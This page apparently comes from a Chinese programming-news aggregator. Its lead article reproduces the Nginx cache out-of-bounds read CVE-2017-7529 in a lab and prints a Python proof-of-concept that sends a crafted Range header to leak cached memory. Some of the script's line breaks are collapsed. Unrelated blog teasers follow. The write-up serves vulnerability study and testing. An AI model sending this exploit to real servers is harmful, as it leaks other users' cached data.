当前位置：首页 > news >正文

Nginx越界读取缓存漏洞（CVE-2017-7529）

news 2025/9/16 2:57:50

漏洞原理：

影响版本内默认配置模块的Nginx只需要开启缓存，攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。

影响范围：

Nginx 0.5.6 – 1.13.2

漏洞复现：

开启靶场，访问8080端口

中间件版本在影响范围内

使用poc验证漏洞：

#!/usr/bin/env python
import sys
import requestsif len(sys.argv) < 2:print("%s url" % (sys.argv[0]))print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))sys.exit()headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)r = requests.get(url, headers=headers)
print(r.text)

Nginx越界读取缓存漏洞（CVE-2017-7529）

漏洞原理： 影响版本内默认配置模块的Nginx只需要开启缓存，攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。影响范围： Nginx 0.5.6 – 1.13.2 漏洞复现： 开启靶场，访问8080端口中间…...

编程日记 2024/9/19 18:45:21

【MySQL】查询语句之inner、left、right、full join 的区别

前言： INNER JOIN 和 OUTER JOIN 是SQL中常用的两种连接方式，用于从两表活多表中提取相关的数据。两者区别主要在于返回的结果集如何处理匹配与不匹配的行。目录 1、INNER JOIN 2、OUTER JOIN 3、总结 1、INNER JOIN 称为内连接，只…...

编程日记 2024/9/19 18:43:17

Submariner 部署全过程

Submariner 部署全过程部署集群配置 broker 集群： pod-cidr：11.244.0.0/16 service-cidr 11.96.0.0/12 broker 172.100.0.109 node 172.100.0.108 集群 1（ pve3 ）： pod-cidr：10.244.0.0/16 service-…...

编程日记 2024/9/19 18:39:09

驼峰命名法

一、驼峰命名法简介驼峰命名法（Camel Case）是一种在编程和人类语言中广泛使用的书写方式，通过将单词连接在一起，并使每个单词的首字母大写来表示复合词或短语。这种命名法有小驼峰法和大驼峰法两种变种。二、小驼峰命名法&…...

编程日记 2024/9/19 18:35:41

Android IME输入法启动显示隐藏流程梳理

阅读Android AOSP 12版本代码，对输入法IME整体框架模块进行学习梳理，内容包含输入法框架三部分IMM、IMMS、IMS的启动流程、点击弹出流程、显示/隐藏流程，以及常见问题和调试技巧。 1. IME整体框架 IME整体分为三个部分&#xf…...

编程日记 2024/9/19 18:32:08

Java 入门指南：JVM（Java虚拟机）——类的生命周期与加载过程

文章目录类的生命周期类加载过程1）载入（Loading）2）验证（Verification）文件格式验证符号引用验证 3）准备（Preparation）4）解析（Resolution&#xf…...

编程日记 2024/9/19 18:22:33

Unity射击游戏开发教程：（36）敌人关卡生成器的设计和开发

丰富多样地游戏关卡生成器能自动生成不同的关卡地图和游戏内容，以增加游戏的可玩性和挑战性。关卡生成可以基于随机算法或者预设的规则生成不同的地图布局、敌人位置、道具位置等。定义关卡生成器WaveSpawner 如何设置通用的 Wave Spawner？我将此 Wave Spawner 脚本附加到…...

编程日记 2024/9/19 18:20:28

AI对汽车行业的冲击和比亚迪新能源汽车市场占比

人工智能（AI）对汽车行业的冲击正在迅速改变该行业的面貌，从智能驾驶到生产自动化，再到个性化的消费者体验，AI带来的技术革新在各个层面影响着汽车产业。与此同时，新能源汽车市场，特别是以比亚迪…...

编程日记 2024/9/19 18:14:41

2024年中国电子学会青少年软件编程（Python）等级考试（一级）核心考点速查卡

考前练习： 2024年06月中国电子学会青少年软件编程（Python）等级考试试卷（一级）答案解析-CSDN博客 2024年03月中国电子学会青少年软件编程（Python）等级考试试卷（一级）答…...

编程日记 2024/9/19 18:11:35

游戏开发引擎__游戏场景（灯光，摄像机）

1.灯光重要参数介绍类型: 控制灯光的类型，有“定向”“点”“区域”和“聚光”4种模式。颜色: 控制灯光的颜色。模式: 控制灯光的光照模式，有“实时”“混合”和“烘焙”3种模式。强度: 控制灯光的明亮程度。间接乘数: 改变间接光的强度。阴影类型: …...

编程日记 2024/9/19 18:07:22

2024 Snap 新款ar眼镜介绍

2024 snap 新款ar眼镜介绍 2024 Snap 新款ar眼镜介绍咨询合作 DataBall 项目，欢迎加以下微信。助力快速掌握数据集的信息和使用方式。...

编程日记 2024/9/19 18:04:14

uni-app生命周期

目录一、页面生命周期 1、onLoad 【常用】 2、onShow【常用】 3、onReady【常用】 4、onHide【常用】 5、onPullDownRefresh【常用】 6、onReachBottom【常用】二、应用生命周期 1、onLaunch【常用】 2、onShow【常用】 3、onHide【常用】三、组件生命周期 1、…...

编程日记 2024/9/19 18:03:13

LabVIEW机械产品几何精度质检系统

随着制造业的发展，对产品质量的要求越来越高，机械产品的几何精度成为衡量其品质的重要指标。为了提高检测效率和精度，开发了一套基于LabVIEW的几何精度质检系统，该系统不仅可以自动化地进行几何尺寸的测量，而且能实时分…...

编程日记 2024/9/19 17:58:08

java 检测图片链接有没有效

实际需求：发送调用微信图片发送接口前检验图片有效性。在 Java 中，检测图片链接是否有效可以通过发送 HTTP 请求来判断服务器返回的状态码。通过 HttpURLConnection 类，可以轻松地实现这个功能。以下是一个简单的示例代码来检测图片链接是否…...

编程日记 2024/9/19 17:54:51

测试工程师学历路径：从功能测试到测试开发

现在软件从业者越来越多，测试工程师的职位也几近饱和，想要获得竞争力还是要保持持续学习。基本学习路径可以从功能测试-自动化测试-测试开发工程师的路子来走。功能测试工程师： 1、软件测试基本概念： 学习软件测试的定义、目的…...

编程日记 2024/9/19 17:52:46

JavaEE---Spring IOC(2)

DI之三种注入属性注入构造方法注入 Setter注入当程序中同一个类有多个对象的时候会报错解决方法如下: AutoWired和Resource的区别...

编程日记 2024/9/19 17:51:45

Oracle字符集

select userenv(language) from dual;如果显示如下，一个汉字占用两个字节 SIMPLIFIED CHINESE_CHINA.ZHS16GBK如果显示如下，一个汉字占用三个字节 SIMPLIFIED CHINESE_CHINA.AL32UTF8可以用以下语句查询一个汉字占用的字节长度 select lengthb(你) fr…...

编程日记 2024/9/19 17:50:41

RabbitMQ 常见使用模式详解

RabbitMQ 常见使用模式详解 RabbitMQ 是一个强大的消息队列中间件，支持多种消息通信模式，能够适应不同的业务场景。在这篇文章中，我们将详细介绍 RabbitMQ 的几种常见使用方法及其对应的场景。 1. 发布/订阅（Publish/Subscribe&a…...

编程日记 2024/9/19 17:48:35

JavaEE初阶——初识EE（Java诞生背景，CPU详解）

阿华代码，不是逆风，就是我疯，你们的点赞收藏是我前进最大的动力！！希望本文内容能帮到你！ 目录零：Java的发展背景介绍一：EE的概念二：计算机的构成 1：CU…...

编程日记 2024/9/19 17:47:34

iOS界面布局：屏幕尺寸与安全区域全面指南

引言随着iPhone和iPad的更新迭代，iOS设备的屏幕尺寸和设计也在不断变化。无论是iPhone X系列的刘海屏，还是最新的iPhone 14，开发者都需要面对适配不同设备布局的问题。在项目开发中，导航栏、状态栏、TabBar的高度以及安全区域的…...

编程日记 2024/9/19 17:46:30

RestClient

什么是RestClient RestClient 是 Elasticsearch 官方提供的 Java 低级 REST 客户端，它允许HTTP与Elasticsearch 集群通信，而无需处理 JSON 序列化/反序列化等底层细节。它是 Elasticsearch Java API 客户端的基础。 RestClient 主要特点轻量级&#xff…...

编程新知 2025/9/11 12:55:08

如何在看板中体现优先级变化

在看板中有效体现优先级变化的关键措施包括：采用颜色或标签标识优先级、设置任务排序规则、使用独立的优先级列或泳道、结合自动化规则同步优先级变化、建立定期的优先级审查流程。其中，设置任务排序规则尤其重要，因为它让看板视觉上直观地体…...

编程新知 2025/9/14 23:47:25

YSYX学习记录（八）

C语言，练习0： 先创建一个文件夹，我用的是物理机： 安装build-essential 练习1： 我注释掉了 #include <stdio.h> 出现下面错误在你的文本编辑器中打开ex1文件，随机修改或删除一部分，之后…...

编程新知 2025/9/13 15:19:41

pam_env.so模块配置解析

在PAM（Pluggable Authentication Modules）配置中， /etc/pam.d/su 文件相关配置含义如下： 配置解析 auth required pam_env.so1. 字段分解字段值说明模块类型auth认证类模块，负责验证用户身份&am…...

编程新知 2025/8/21 21:33:01

质量体系的重要

质量体系是为确保产品、服务或过程质量满足规定要求，由相互关联的要素构成的有机整体。其核心内容可归纳为以下五个方面： 🏛️ 一、组织架构与职责质量体系明确组织内各部门、岗位的职责与权限，形成层级清晰的管理网络&#xf…...

编程新知 2025/8/3 5:51:09

跨链模式：多链互操作架构与性能扩展方案

跨链模式：多链互操作架构与性能扩展方案 ——构建下一代区块链互联网的技术基石一、跨链架构的核心范式演进 1. 分层协议栈：模块化解耦设计现代跨链系统采用分层协议栈实现灵活扩展（H2Cross架构）： 适配层&#xf…...

编程新知 2025/8/30 10:09:32

Java 二维码

Java 二维码 **技术：**谷歌 ZXing 实现首先添加依赖 <dependency><groupId>com.google.zxing</groupId><artifactId>core</artifactId><version>3.5.1</version></dependency><de…...

编程新知 2025/9/6 16:22:45